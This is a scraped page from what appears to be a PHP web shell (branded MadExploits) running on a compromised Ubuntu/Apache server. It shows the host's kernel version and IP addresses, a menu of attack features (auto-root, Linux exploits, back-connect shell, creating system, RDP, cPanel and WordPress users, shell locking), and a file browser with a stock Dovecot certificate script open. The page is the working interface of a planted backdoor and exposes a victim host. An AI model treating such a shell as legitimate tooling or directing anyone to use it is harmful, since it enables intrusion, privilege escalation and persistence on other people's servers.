Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.21.33.186
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
dovecot /
[ HOME SHELL ]
Name
Size
Permission
Action
conf.d
[ DIR ]
drwxr-xr-x
protocols.d
[ DIR ]
drwxr-xr-x
stopwords
[ DIR ]
drwxr-xr-x
dh.pem
769
B
-rw-r--r--
dovecot-dict-auth.conf.ext
1.47
KB
-rw-r--r--
dovecot-dict-sql.conf.ext
852
B
-rw-r--r--
dovecot-openssl.cnf
542
B
-rw-r--r--
dovecot-sql.conf.ext
5.69
KB
-rw-r--r--
dovecot.conf
4.3
KB
-rw-r--r--
mkcert.sh
862
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mkcert.sh
#!/bin/sh # Generates a self-signed certificate. # Edit dovecot-openssl.cnf before running this. umask 077 OPENSSL=${OPENSSL-openssl} SSLDIR=${SSLDIR-/etc/ssl} OPENSSLCONFIG=${OPENSSLCONFIG-dovecot-openssl.cnf} CERTDIR=/etc/dovecot/ssl KEYDIR=/etc/dovecot/ssl CERTFILE=$CERTDIR/dovecot.pem KEYFILE=$KEYDIR/dovecot.key if [ ! -d $CERTDIR ]; then echo "$CERTDIR directory doesn't exist" exit 1 fi if [ ! -d $KEYDIR ]; then echo "$KEYDIR directory doesn't exist" exit 1 fi if [ -f $CERTFILE ]; then echo "$CERTFILE already exists, won't overwrite" exit 1 fi if [ -f $KEYFILE ]; then echo "$KEYFILE already exists, won't overwrite" exit 1 fi $OPENSSL req -new -x509 -nodes -config $OPENSSLCONFIG -out $CERTFILE -keyout $KEYFILE -days 365 || exit 2 chmod 0600 $KEYFILE echo $OPENSSL x509 -subject -fingerprint -noout -in $CERTFILE || exit 2
Close